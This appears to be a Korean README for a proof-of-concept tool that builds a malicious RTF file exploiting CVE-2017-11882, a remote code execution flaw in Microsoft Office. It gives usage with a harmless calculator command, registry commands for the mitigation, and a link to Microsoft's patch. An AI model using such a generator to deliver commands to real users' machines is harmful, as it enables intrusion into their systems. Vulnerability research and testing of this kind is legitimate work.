
CVE-2017-11882 파일 생성기 PoC
Microsoft Office 소프트웨어가 메모리 내 객체를 올바르게 처리하지 못할 때 발생하는 원격 코드 실행 취약점입니다. 취약점을 성공적으로 악용한 공격자는 현재 사용자의 컨텍스트에서 임의의 코드를 실행할 수 있습니다.
이것은 Embedi가 제작한 원본 PoC를 재편집한 것으로, 원격 명령 실행이 포함된 단일 .rtf 파일을 생성합니다.
python 2017-11882_Generator.py -x 실행할_명령어 -o 출력_파일_이름
예시: python 2017-11882_Generator.py -x "cmd /c calc" -o test.rtf
x86 OS의 32비트 Microsoft Office 패키지: reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
x64 OS의 32비트 Microsoft Office 패키지: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
Microsoft는 패치를 출시했습니다. https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882